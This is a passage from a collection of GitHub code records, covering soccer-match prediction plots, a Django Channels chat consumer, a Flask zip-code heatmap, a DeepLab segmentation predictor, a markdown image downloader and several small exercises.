SUCKS\")","repo_name":"borisbho/PythonPractice","sub_path":"thumb_picture/thumb.py","file_name":"thumb.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74393760910","text":"# -*- coding: utf-8 -*-\n\nfrom Utils.Poisson import *\nfrom Utils.LineaRegression import *\nfrom Utils.LogisticRegression import *\nfrom Utils.RandomForest import *\nfrom matplotlib import pyplot\n\nhome = args.domicile\naway = args.exterieur\nexception(home, away)\nfonction = args.fonction\n\n\ndef main():\n if fonction == \"butsprobables\":\n n1 = butsprobablesdomicile(home, away)\n print(\"****************************************************************************************\")\n print(\" \" + home + \" est susceptible de marquer {} buts en moyenne dans ce match\".format(n1))\n print(\"****************************************************************************************\")\n n2 = butsprobablesexterieur(home, away)\n print(\"****************************************************************************************\")\n print(\" \" + away + \" est susceptible de marquer {} buts en moyenne dans ce match\".format(n2))\n print(\"****************************************************************************************\")\n liste = [n1, n2]\n pyplot.bar(range(2), liste, width=0.6, color='green',\n edgecolor='red', linewidth=2, yerr=[0.5, 1],\n ecolor='magenta', capsize=10)\n pyplot.xticks([x + 0.6 / 2 for x in range(3)], [home, away],\n rotation=360)\n plt.xlabel(\"Equipes\")\n plt.ylabel(\"Buts Problables\")\n plt.title(\"Combien du buts dans cette confrontation?\")\n plt.show()\n elif fonction == \"graph\":\n resultgraph(home, away)\n elif fonction == \"entrainement\":\n traindata[\"FTR\"].value_counts().plot.pie(explode=[0.025, 0.025, 0.025], shadow=True,\n colors=['#ccff99', '#e65c00', '#6699ff'], autopct='%1.1f%%')\n plt.title(\"Visualisation des donnees d'entrainement\")\n 
plt.show()\n elif fonction == \"prediction\":\n predictdata[\"FTR\"].value_counts().plot.pie(explode=[0.025, 0.025, 0.025], shadow=True,\n colors=['#ccff99', '#e65c00', '#6699ff'], autopct='%1.1f%%')\n plt.title(\"Visualisation des donnees de prediction\")\n plt.show()\n elif fonction == \"attaque\":\n d = merged()\n h = d[home][\"AttaqueHome\"]\n a = d[away][\"AttaqueAway\"]\n print(\"************************************************\")\n print(\" \" + home + \" a pour force offensive {}\".format(h))\n print(\"*************************************************\")\n print(\"\\n\")\n print(\"************************************************\")\n print(\" \" + away + \" a pour force offensive {}\".format(a))\n print(\"*************************************************\")\n liste = [h, a]\n pyplot.bar(range(2), liste, width=0.6, color='red',\n edgecolor='green', linewidth=2, yerr=[0.5, 1],\n ecolor='magenta', capsize=10)\n pyplot.xticks([x + 0.6 / 2 for x in range(3)], [home, away],\n rotation=360)\n plt.xlabel(\"Equipes\")\n plt.ylabel(\"Force Offensive\")\n plt.title(\"Comparaison des forces d'attaque\")\n plt.show()\n elif fonction == \"defense\":\n d = merged()\n h = d[home][\"DefenseHome\"]\n a = d[away][\"DefenseAway\"]\n print(\"************************************************\")\n print(\" \" + home + \" a pour force défensive {}\".format(h))\n print(\"*************************************************\")\n print(\"\\n\")\n print(\"************************************************\")\n print(\" \" + away + \" a pour force défensive {}\".format(a))\n print(\"*************************************************\")\n liste = [h, a]\n pyplot.bar(range(2), liste, width=0.6, color='blue',\n edgecolor='green', linewidth=2, yerr=[0.5, 1],\n ecolor='magenta', capsize=10)\n pyplot.xticks([x + 0.6 / 2 for x in range(3)], [home, away],\n rotation=360)\n plt.xlabel(\"Equipes\")\n plt.ylabel(\"Force Defensive\")\n plt.title(\"Comparaison des forces de defense\")\n plt.show()\n elif fonction == \"goals\":\n d = merged()\n h = d[home][\"ButsHome\"]\n a = d[away][\"ButsAway\"]\n liste = [h, a]\n print(liste)\n pyplot.bar(range(2), liste, width=0.6, color='pink',\n edgecolor='green', linewidth=2, yerr=[0.5, 1],\n ecolor='magenta', capsize=10)\n pyplot.xticks([x + 0.6 / 2 for x in range(3)], [\"Domicile\", \"Exterieur\"],\n rotation=360)\n plt.xlabel(\"Lieu du match\")\n plt.ylabel(\"Nombre de buts\")\n plt.title(\"Nombre de buts a domicile VS Nombre de buts a l'exterieur\")\n plt.show()\n elif fonction == \"precision\":\n liste = [pprecision(), rprecision(), linearprecision(), logisticprecision()]\n pyplot.bar(range(4), liste, width=0.6, color='black',\n edgecolor='green', linewidth=2, yerr=[0.5, 1, 2, 1],\n ecolor='magenta', capsize=10)\n pyplot.xticks([x + 0.6 / 2 for x in range(5)], ['Poisson', 'Random', 'Linear', 'Logistic'],\n rotation=360)\n plt.xlabel(\"Methodes\")\n plt.ylabel(\"Precision\")\n plt.title(\"Comparaison des methodes\")\n plt.show()\n else:\n print(\"POISSON:\")\n print(\"\\n\")\n chaine = pfulltimeresult(home, away)\n print(\"----------------------------------------------\")\n print(\"| \" + chaine)\n print(\"----------------------------------------------\")\n print(\"\\n\")\n print(\"RANDOM FOREST:\")\n print(\"\\n\")\n chaine = rfulltimeresult(home, away)\n print(\"----------------------------------------------\")\n print(\"| \" + chaine)\n print(\"----------------------------------------------\")\n print(\"\\n\")\n print(\"LINEAR SVC:\")\n print(\"\\n\")\n chaine = 
linearfulltimeresult(home, away)\n print(\"----------------------------------------------\")\n print(\"| \" + chaine)\n print(\"----------------------------------------------\")\n print(\"\\n\")\n print(\"LOGISTIC REGRESSION:\")\n print(\"\\n\")\n chaine = logisticfulltimeresult(home, away)\n print(\"----------------------------------------------\")\n print(\"| \" + chaine)\n print(\"----------------------------------------------\")\n print(\"\\n\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CazabetLyon1/SoccerPrediction","sub_path":"Simulator.py","file_name":"Simulator.py","file_ext":"py","file_size_in_byte":6544,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12065400105","text":"import numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport time\n\nrandom.seed(9)\nx_data = np.array([-3, -1, 1, 3]).reshape(-1, 1)\ny_data = np.array([3, 4.5, 4.5, 5.5]).reshape(-1, 1)\n\n\ndef model(x):\n global m, c\n y = m * x + c\n return y\n\n\nm = random.uniform(-1, 1)\nc = 0\ny_init = model(x_data)\nfig = plt.figure()\nplt.axis([-4, 4, -1, 7])\nplt.scatter(x_data, y_data)\nplt.plot(x_data, y_init)\nplt.draw()\nlearn_rate = 0.01\niterations = 100\nfor i in range(iterations):\n plt.clf()\n for i, j in zip(x_data, y_data):\n y = model(i)\n error = j - y\n m += learn_rate * error * i\n c += learn_rate * error\n\n y_next = model(x_data)\n plt.plot(x_data, y_next)\n plt.scatter(x_data, y_data)\n\n plt.plot(x_data, y_init)\n\n plt.pause(0.001)\n\n\nplt.show()\n\n\n\"\"\"\nimport time\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef tellme(s):\n print(s)\n plt.title(s, fontsize=16)\n plt.draw()\n\n\nplt.clf()\nplt.setp(plt.gca(), autoscale_on=False)\n\ntellme(\"You will define a triangle, click to begin\")\n\nplt.waitforbuttonpress()\n\nwhile True:\n pts = []\n while len(pts) < 3:\n tellme(\"Select 3 corners with mouse\")\n pts = np.asarray(plt.ginput(3, timeout=-1))\n if len(pts) < 3:\n tellme(\"Too few points, starting over\")\n time.sleep(1) # Wait a second\n\n ph = plt.fill(pts[:, 0], pts[:, 1], \"r\", lw=2)\n\n tellme(\"Happy? 
Key click for yes, mouse click for no\")\n\n if plt.waitforbuttonpress():\n break\n\n # Get rid of fill\n for p in ph:\n p.remove()\n\n\n# Define a nice function of distance from individual pts\ndef f(x, y, pts):\n z = np.zeros_like(x)\n for p in pts:\n z = z + 1 / (np.sqrt((x - p[0]) ** 2 + (y - p[1]) ** 2))\n return 1 / z\n\n\nX, Y = np.meshgrid(np.linspace(-1, 1, 51), np.linspace(-1, 1, 51))\nZ = f(X, Y, pts)\n\nCS = plt.contour(X, Y, Z, 20)\n\ntellme(\"Use mouse to select contour label locations, middle button to finish\")\nCL = plt.clabel(CS, manual=True)\ntellme(\"Now do a nested zoom, click to begin\")\nplt.waitforbuttonpress()\n\nwhile True:\n tellme(\"Select two corners of zoom, middle mouse button to finish\")\n pts = plt.ginput(2, timeout=-1)\n if len(pts) < 2:\n break\n (x0, y0), (x1, y1) = pts\n xmin, xmax = sorted([x0, x1])\n ymin, ymax = sorted([y0, y1])\n plt.xlim(xmin, xmax)\n plt.ylim(ymin, ymax)\n\ntellme(\"All Done!\")\nplt.show()\n\"\"\"\n","repo_name":"shvamabps/Interest-Calculator","sub_path":"ploting.py","file_name":"ploting.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"19473646650","text":"class CashRegister :\n def __init__(self) :\n self._itemCount = 0\n self._totalPrice = 0.0\n def addItem(self, price) :\n self._itemCount = self._itemCount + 1\n self._totalPrice = self._totalPrice + price \n def getTotal(self) :\n return self._totalPrice \n def getCount(self) :\n return self._itemCount\n def clear(self) :\n self._itemCount = 0\n self._totalPrice = 0.0\n\n#method implementation giveChange(self, payment)\n def giveChange(self, payment):\n if payment == self._totalPrice:\n print(\"Thank You For Shopping: \")\n return 0\n if payment > self._totalPrice:\n print(\"Give change: \")\n return payment - self._totalPrice\n if payment < self._totalPrice:\n print(\"Please, you need to pay extra £: \")\n return payment - self._totalPrice \n#customer 1\nregister1 = CashRegister()\nregister1.addItem(0.90)\nregister1.addItem(0.95)\n# customer 2\nregister2 = CashRegister()\nregister2.addItem(1.90)\n\nprint(\"Customer has to pay: £\",register1.getTotal())\nprint(\"Customer has bought : \",register1.getCount() , \"products\")\n#test1 customer hands more than total, requires change \nprint(register1.giveChange(20))#assuming that customer handed £20\nprint()\nprint(\"Customer has to pay: £\",register2.getTotal())\nprint(\"Customer has bought :\",register2.getCount() , \"product\")\nprint(register2.giveChange(50))#assuming that customer handed £50\n\n\n#test2 customer hands less than total needs to be asked for more money\n#print(\"%.2f\" % register1.giveChange(1.5))#assuming that customer handed £1.5\n#test3 customer gives exactly total amount , no further action required.\n#print(register1.giveChange(1.85))#assuming that customer handed exactly £1.85\n\n\n\n","repo_name":"lw6c/IntroSoftDevel","sub_path":"session10/s10_task_3d.py","file_name":"s10_task_3d.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"74615010832","text":"import json\n\nfrom channels.db import database_sync_to_async\nfrom channels.generic.websocket import AsyncWebsocketConsumer\n\nfrom .models.roomchat import Message, Room, RoomMember\n\n\nclass ChatConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n self.room_number_id = self.scope[\"url_route\"][\"kwargs\"][\"room_number_id\"]\n 
self.room_group_name = \"chat_%s\" % self.room_number_id\n\n # Join room group\n try:\n await self.channel_layer.group_add(self.room_group_name, self.channel_name)\n except Exception as ex:\n print(ex)\n try:\n room_member = RoomMember.objects.get(\n room__room_number=self.room_number_id, member=self.scope[\"user\"]\n )\n room_member.is_online = True\n room_member.save()\n except Exception as ex:\n print(ex)\n online_room_member_names = list(\n RoomMember.objects.filter(\n room__room_number=self.room_number_id, is_online=True\n ).values_list(\"member__first_name\", flat=True)\n )\n\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n \"type\": \"new_user_join_signal\",\n \"room_number\": str(room_member.room.room_number),\n \"room_member_id\": room_member.id,\n \"online_room_member_names\": online_room_member_names,\n },\n )\n\n await self.accept()\n\n async def disconnect(self, close_code):\n # Leave room group\n try:\n room_member = RoomMember.objects.get(\n room__room_number=self.room_number_id, member=self.scope[\"user\"]\n )\n room_member.is_online = False\n room_member.save()\n except Exception as ex:\n print(ex)\n\n online_room_member_names = list(\n RoomMember.objects.filter(\n room__room_number=self.room_number_id, is_online=True\n ).values_list(\"member__first_name\", flat=True)\n )\n try:\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n \"type\": \"send_user_offline_signal\",\n \"room_number\": str(room_member.room.room_number),\n \"room_member_id\": room_member.id,\n \"online_room_member_names\": online_room_member_names,\n },\n )\n except Exception as ex:\n print(ex)\n\n try:\n await self.channel_layer.group_discard(\n self.room_group_name, self.channel_name\n )\n except Exception as ex:\n print(ex)\n\n # Receive message from WebSocket\n async def receive(self, text_data):\n text_data_json = json.loads(text_data)\n\n message_type = text_data_json.get(\"type\")\n\n if message_type == \"chat_message\":\n message = text_data_json.get(\"message\")\n user_id = text_data_json.get(\"user_id\")\n message = await self.create_message(message, self.room_number_id, user_id)\n\n # Send message to room group\n try:\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n \"type\": \"chat_message\",\n \"message\": message.message,\n \"message_id\": message.id,\n \"room_member_id\": message.room_member.id,\n \"room_member_image_src\": message.room_member.member.image.url,\n \"room_member_first_name\": message.room_member.member.first_name,\n \"user_id\": message.room_member.member.id,\n },\n )\n except Exception as ex:\n print(ex)\n\n elif message_type == \"read_message_signal\":\n room_number = text_data_json.get(\"room_number\")\n user_id = text_data_json.get(\"user_id\")\n try:\n room = Room.objects.get(room_number=room_number)\n room_member = RoomMember.objects.get(member__id=user_id, room=room)\n [\n message.reader.add(room_member)\n for message in Message.objects.filter(room_member__room=room)\n ]\n except Exception as ex:\n print(ex)\n\n elif message_type == \"invite_member\":\n try:\n await self.channel_layer.group_send(\n self.room_group_name,\n {**text_data_json, \"sender\": self.scope[\"user\"].id},\n )\n except Exception as ex:\n print(ex)\n\n # Receive message from room group\n\n async def chat_message(self, event):\n # Send message to WebSocket\n try:\n await self.send(text_data=json.dumps({**event}))\n except Exception as ex:\n print(ex)\n\n async def send_user_offline_signal(self, event):\n try:\n await 
self.send(text_data=json.dumps({**event}))\n except Exception as ex:\n print(ex)\n\n async def new_user_join_signal(self, event):\n try:\n await self.send(text_data=json.dumps({**event}))\n except Exception as ex:\n print(ex)\n\n async def file_upload(self, event):\n try:\n await self.send(text_data=json.dumps({**event}))\n except Exception as ex:\n print(ex)\n\n async def invite_member(self, event):\n try:\n await self.send(text_data=json.dumps({**event}))\n except Exception as ex:\n print(ex)\n\n @database_sync_to_async\n def create_message(self, message, room_number_id, user_id):\n try:\n room_member = RoomMember.objects.get(\n member__id=user_id, room__room_number=room_number_id\n )\n message = Message.objects.create(message=message, room_member=room_member)\n message.reader.add(room_member)\n return message\n except Exception as ex:\n print(ex)\n return False\n\n\nclass ProtectedConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n self.user_id = self.scope[\"url_route\"][\"kwargs\"][\"user_id\"]\n self.room_group_name = \"protected_%s\" % str(self.user_id)\n\n try:\n await self.channel_layer.group_add(self.room_group_name, self.channel_name)\n except Exception as ex:\n print(ex)\n\n await self.accept()\n\n async def disconnect(self, close_code):\n try:\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n \"type\": \"disconnect_success\",\n \"room_group_name\": self.room_group_name,\n },\n )\n except Exception as ex:\n print(ex)\n\n async def receive(self, text_data):\n text_data = json.loads(text_data)\n # message_type = text_data[\"type\"]\n\n # new connection handler\n try:\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n \"type\": \"connection_success\",\n },\n )\n except Exception as ex:\n print(ex)\n\n try:\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n \"type\": \"update_discussion\",\n },\n )\n except Exception as ex:\n print(ex)\n\n async def connection_success(self, event):\n try:\n await self.send(text_data=json.dumps({**event}))\n except Exception as ex:\n print(ex)\n\n async def update_discussion(self, event):\n try:\n await self.send(text_data=json.dumps({**event}))\n except Exception as ex:\n print(ex)\n","repo_name":"harshilsuthar/videochat","sub_path":"chat/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":7916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18961459731","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask, request, Response, render_template\nimport csv\nimport json\nimport os\nimport re\n\nfrom zips import ZIPS_TO_LNG_LAT\n\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/submit', methods=['POST'])\ndef success():\n all_zips = request.form['zips'].split(\"\\n\")\n heat_map = {}\n for zipcode in all_zips:\n try:\n formatted_zipcode = str(int(zipcode)).zfill(5)\n except ValueError:\n continue\n\n if not formatted_zipcode in ZIPS_TO_LNG_LAT:\n continue\n\n if not formatted_zipcode in heat_map:\n heat_map[formatted_zipcode] = {'count': 0, 'lnglat': ZIPS_TO_LNG_LAT[formatted_zipcode]}\n\n heat_map[formatted_zipcode]['count'] += 1\n\n context = {'heat_map': heat_map,\n 'radius': request.form['radius'],\n 'max_opacity': request.form['max_opacity'] }\n\n return render_template('map.html', **context)\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.debug = port == 5000\n app.run(host='0.0.0.0', 
port=port)","repo_name":"Bernie-2016/ZipToHeatmaps","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34217555481","text":"# 小A 和 小B 在玩猜数字。小B 每次从 1, 2, 3 中随机选择一个,小A 每次也从 1, 2, 3 中选择一个猜。他们一共进行三次这个游戏,请返回 小A 猜对了几次?\n#\n#  \n#\n# 输入的guess数组为 小A 每次的猜测,answer数组为 小B 每次的选择。guess和answer的长度都等于3。\n#\n# 来源:力扣(LeetCode)\n# 链接:https://leetcode-cn.com/problems/guess-numbers\n# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\n# 示例 1:\n#\n# 输入:guess = [1,2,3], answer = [1,2,3]\n# 输出:3\n# 解释:小A 每次都猜对了。\n#  \n#\n# 示例 2:\n#\n# 输入:guess = [2,2,3], answer = [3,2,1]\n# 输出:1\n# 解释:小A 只猜对了第二次。\n#\n# 来源:力扣(LeetCode)\n# 链接:https://leetcode-cn.com/problems/guess-numbers\n# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\ndef game(guess, answer):\n \"\"\"\n :type guess: List[int]\n :type answer: List[int]\n :rtype: int\n \"\"\"\n num = 0\n for i in range(0,len(guess)):\n if(guess[i] == answer[i]):\n num = num+1\n return num\n\nif __name__ == '__main__':\n guess = [2, 2, 3]\n answer = [3, 2, 1]\n print(game(guess,answer))\n","repo_name":"RandySarah/LeetCode","sub_path":"array/guess-numbers.py","file_name":"guess-numbers.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12798669890","text":"import alsaaudio, wave, numpy\nimport os\n\n\nclass Recorder:\n def __init__(self):\n pass\n\n def __data_to_record(self, sampling_rate=8000, period_size=256, wav_title=\"record.wav\"):\n self.__inp = alsaaudio.PCM(alsaaudio.PCM_CAPTURE)\n self.__inp.setchannels(1)\n self.__inp.setrate(sampling_rate)\n self.__inp.setformat(alsaaudio.PCM_FORMAT_S16_LE)\n self.__inp.setperiodsize(period_size)\n\n self.__w = wave.open(wav_title, 'w')\n self.__w.setnchannels(1)\n self.__w.setsampwidth(2)\n self.__w.setframerate(sampling_rate)\n\n def record(self, time_to_run=2, args=[]):\n if len(args) > 1:\n self.__data_to_record(wav_title=str(args[2]) + \".wav\")\n else:\n self.__data_to_record()\n\n beginning = os.times()[4]\n while beginning + time_to_run > os.times()[4]:\n l, data = self.__inp.read()\n a = numpy.fromstring(data, dtype='int16')\n self.__w.writeframes(data)\n\n print(\"_time elapsed: \" + str(os.times()[4] - beginning) + \" seconds\")\n","repo_name":"wsacin/speech-recognition","sub_path":"Recorder.py","file_name":"Recorder.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"14575503578","text":"# -*- coding: UTF-8 -*-\n\nimport re\nimport requests\nimport codecs\nimport sys\nimport imghdr\nimport os\nimport uuid\n\n\ndef get_md_str(file_name):\n f = codecs.open(file_name, 'r', 'utf-8')\n return f.read()\n\n\ndef get_urls_in_md(md_str):\n pattern = re.compile(r'!\\[(.*?)\\]\\((.*?)\\)')\n iters = pattern.finditer(md_str)\n return iters\n\n\ndef get_img(url):\n resp = requests.get(url)\n if resp.ok:\n return resp.content\n else:\n return None\n\n\ndef write_to_file(img, file_name):\n with open(file_name, 'wb') as f:\n f.write(img)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print('usage: download_img_in_md.py input_md_file_path output_img_dir_path')\n exit(-1)\n else:\n input_md_file_path = sys.argv[1]\n output_img_dir_path = sys.argv[2]\n print(\"input md file: \"+input_md_file_path)\n md_str = get_md_str(input_md_file_path)\n url_iters = get_urls_in_md(md_str)\n for url_iter in 
url_iters:\n print(\"\\tfound: \"+url_iter.group(0))\n img_name = url_iter.group(1).strip()\n img_url = url_iter.group(2).split(' ')[0].strip()\n img_data = get_img(img_url)\n img_format = imghdr.what('', h=img_data)\n img_file_path = os.path.join(\n output_img_dir_path, img_name+'.'+img_format)\n if len(img_name) == 0 or os.path.exists(img_file_path):\n img_file_path = os.path.join(\n output_img_dir_path, img_name+'('+str(uuid.uuid1())+')'+'.'+img_format)\n write_to_file(img_data, img_file_path)\n print(\"\\t\\twrote to: \"+img_file_path)\n","repo_name":"CleverWang/Blogs","sub_path":"download_img_in_md.py","file_name":"download_img_in_md.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71313088910","text":"from bs4 import BeautifulSoup\n\nbase_url = 'https://comoquiero.net'\nfood_list = open('list.html', encoding='utf8')\n\ndef read_list_item(list_file):\n line = list_file.readline().strip('\\n')\n item = ''\n while line != '':\n line = list_file.readline().strip('\\n')\n if ' 1:\r\n # probs = F.softmax(output, dim=1)\r\n # probs = torch.argmax(probs, dim=1).float()\r\n # else:\r\n # probs = torch.sigmoid(output)\r\n\r\n # probs = probs.squeeze(0)\r\n\r\n # tf = transforms.Compose(\r\n # [\r\n # transforms.ToPILImage(),\r\n # transforms.Resize(full_img.size[1]),\r\n # transforms.ToTensor()\r\n # ]\r\n # )\r\n\r\n # probs = tf(probs.cpu())\r\n # full_mask = probs.squeeze().cpu().numpy()\r\n \r\n # if net.n_classes > 1:\r\n # final_mask = full_mask\r\n # else:\r\n # final_mask = full_mask > out_threshold\r\n\r\n # return final_mask\r\n\r\n\r\ndef get_args():\r\n parser = argparse.ArgumentParser(description=\"PyTorch DeeplabV3Plus Training\")\r\n parser.add_argument('--backbone', type=str, default='resnet',\r\n choices=['resnet', 'xception', 'drn', 'mobilenet'],\r\n help='backbone name (default: resnet)')\r\n parser.add_argument('--out-stride', type=int, default=16,\r\n help='network output stride (default: 8)')\r\n parser.add_argument('--dataset', type=str, default='tables',\r\n choices=['tables', 'pascal', 'coco', 'cityscapes'],\r\n help='dataset name (default: tables)')\r\n parser.add_argument('--use-sbd', action='store_true', default=False,\r\n help='whether to use SBD dataset (default: False)')\r\n parser.add_argument('--workers', type=int, default=4,\r\n metavar='N', help='dataloader threads')\r\n parser.add_argument('--base-size', type=int, default=513,\r\n help='base image size')\r\n parser.add_argument('--crop-size', type=int, default=513,\r\n help='crop image size')\r\n parser.add_argument('--sync-bn', type=bool, default=None,\r\n help='whether to use sync bn (default: auto)')\r\n parser.add_argument('--freeze-bn', type=bool, default=False,\r\n help='whether to freeze bn parameters (default: False)')\r\n parser.add_argument('--loss-type', type=str, default='ce',\r\n choices=['ce', 'focal'],\r\n help='loss func type (default: ce)')\r\n # training hyper params\r\n parser.add_argument('--epochs', type=int, default=None, metavar='N',\r\n help='number of epochs to train (default: auto)')\r\n parser.add_argument('--start_epoch', type=int, default=0,\r\n metavar='N', help='start epochs (default:0)')\r\n parser.add_argument('--batch-size', type=int, default=None,\r\n metavar='N', help='input batch size for \\\r\n training (default: auto)')\r\n parser.add_argument('--test-batch-size', type=int, default=None,\r\n metavar='N', help='input batch size for \\\r\n testing (default: 
auto)')\r\n parser.add_argument('--use-balanced-weights', action='store_true', default=False,\r\n help='whether to use balanced weights (default: False)')\r\n # optimizer params\r\n parser.add_argument('--lr', type=float, default=None, metavar='LR',\r\n help='learning rate (default: auto)')\r\n parser.add_argument('--lr-scheduler', type=str, default='poly',\r\n choices=['poly', 'step', 'cos'],\r\n help='lr scheduler mode: (default: poly)')\r\n parser.add_argument('--momentum', type=float, default=0.9,\r\n metavar='M', help='momentum (default: 0.9)')\r\n parser.add_argument('--weight-decay', type=float, default=5e-4,\r\n metavar='M', help='w-decay (default: 5e-4)')\r\n parser.add_argument('--nesterov', action='store_true', default=False,\r\n help='whether use nesterov (default: False)')\r\n # cuda, seed and logging\r\n parser.add_argument('--no-cuda', action='store_true', default=\r\n False, help='disables CUDA training')\r\n parser.add_argument('--gpu-ids', type=str, default='0',\r\n help='use which gpu to train, must be a \\\r\n comma-separated list of integers only (default=0)')\r\n parser.add_argument('--seed', type=int, default=1, metavar='S',\r\n help='random seed (default: 1)')\r\n # checking point\r\n parser.add_argument('--resume', type=str, default=None,\r\n help='put the path to resuming file if needed')\r\n parser.add_argument('--checkname', type=str, default=None,\r\n help='set the checkpoint name')\r\n # finetuning pre-trained models\r\n parser.add_argument('--ft', action='store_true', default=False,\r\n help='finetuning on a different dataset')\r\n # evaluation option\r\n parser.add_argument('--eval-interval', type=int, default=1,\r\n help='evaluation interval (default: 1)')\r\n parser.add_argument('--no-val', action='store_true', default=False,\r\n help='skip validation during training')\r\n\r\n # for prediction\r\n parser.add_argument('--model', '-m', default='MODEL.pth',\r\n metavar='FILE',\r\n help=\"Specify the file in which the model is stored\")\r\n parser.add_argument('--input', '-i', metavar='INPUT', nargs='+',\r\n help='filenames of input images', required=True)\r\n\r\n parser.add_argument('--output', '-o', metavar='INPUT', nargs='+',\r\n help='Filenames of output images')\r\n\r\n # options referenced by the prediction code below; these were missing from\r\n # the parser (short flags and default values assumed)\r\n parser.add_argument('--viz', '-v', action='store_true', default=False,\r\n help='visualize the images as they are processed')\r\n parser.add_argument('--no-save', '-n', action='store_true', default=False,\r\n help='do not save the output masks')\r\n parser.add_argument('--mask-threshold', '-t', type=float, default=0.5,\r\n help='minimum probability value to consider a mask pixel white')\r\n parser.add_argument('--scale', '-s', type=float, default=0.5,\r\n help='scale factor for the input images')\r\n\r\n return parser.parse_args()\r\n\r\n\r\ndef get_output_filenames(args):\r\n in_files = args.input\r\n out_files = []\r\n\r\n if not args.output:\r\n for f in in_files:\r\n pathsplit = os.path.splitext(f)\r\n out_files.append(\"{}_OUT{}\".format(pathsplit[0], pathsplit[1]))\r\n elif len(in_files) != len(args.output):\r\n logging.error(\"Input files and output files are not of the same length\")\r\n raise SystemExit()\r\n else:\r\n out_files = args.output\r\n\r\n return out_files\r\n\r\n\r\ndef mask_to_image(mask):\r\n # return Image.fromarray((mask * 255).astype(np.uint8))\r\n return Image.fromarray((mask).astype(np.uint8))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n args = get_args()\r\n in_files = args.input\r\n out_files = get_output_filenames(args)\r\n \r\n ## number of target classes\r\n n_classes = 3\r\n # net = UNet(n_channels=3, n_classes=n_classes)\r\n # \r\n net = DeepLab(num_classes=n_classes,\r\n backbone=args.backbone,\r\n output_stride=args.out_stride,\r\n sync_bn=args.sync_bn,\r\n freeze_bn=args.freeze_bn)\r\n\r\n logging.info(\"Loading model {}\".format(args.model))\r\n\r\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n logging.info(f'Using device {device}')\r\n net.to(device=device)\r\n net.load_state_dict(torch.load(args.model, 
map_location=device))\r\n\r\n logging.info(\"Model loaded !\")\r\n\r\n for i, fn in enumerate(in_files):\r\n logging.info(\"\\nPredicting image {} ...\".format(fn))\r\n\r\n img = Image.open(fn)\r\n\r\n mask = predict_img(net=net,\r\n full_img=img,\r\n scale_factor=args.scale,\r\n out_threshold=args.mask_threshold,\r\n device=device)\r\n\r\n # if n_classes > 1:\r\n # mask = mask / n_classes\r\n \r\n print(type(mask))\r\n print(mask.shape)\r\n print(mask)\r\n\r\n if not args.no_save:\r\n out_fn = out_files[i]\r\n \r\n result = mask_to_image(mask)\r\n result.save(out_files[i])\r\n\r\n logging.info(\"Mask saved to {}\".format(out_files[i]))\r\n\r\n if args.viz:\r\n logging.info(\"Visualizing results for image {}, close to continue ...\".format(fn))\r\n plot_img_and_mask(img, mask)\r\n","repo_name":"hainan89/TableGraph","sub_path":"pytorch-deeplab-xception/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":8886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32403978915","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 12 12:26:00 2020\n\n@author: piaverous\n\"\"\"\n\nfrom .models import Match\nfrom psycopg2.extras import execute_values\n\nclass MatchDatabase(object):\n def __init__(self, db_conn):\n self.db_connection = db_conn\n\n \"\"\" Insert multiple matches.\n \n Args :\n matches = [(id, winner_id, loser_id, winner_side)] \n // List of tuples of matches -> (int, int, int, bool) or (int, int, int)\n // NB: if winner_side is not known, leave empty and it will be set to NULL\n // NBB: winner_id and loser_id are FKEYS to algos table, so this will fail \n // if you have not inserted the algos beforehand\n \"\"\"\n def insert_many(self, matches):\n if len(matches) == 0:\n return \n\n cur = self.db_connection.cursor()\n execute_values(\n cur,\n \"INSERT INTO matches (id, winner_id, loser_id, winner_side, date) VALUES %s\",\n map(lambda x: x if len(x) == 5 else (x[0], x[1], x[2], None, x[3]), matches)\n )\n self.db_connection.commit()\n cur.close()\n\n\n \"\"\" Gets all matches in the DB. \"\"\"\n def find_all(self):\n cur = self.db_connection.cursor()\n cur.execute(\"SELECT * FROM matches m WHERE NOT m.crashed\")\n matches = cur.fetchall()\n 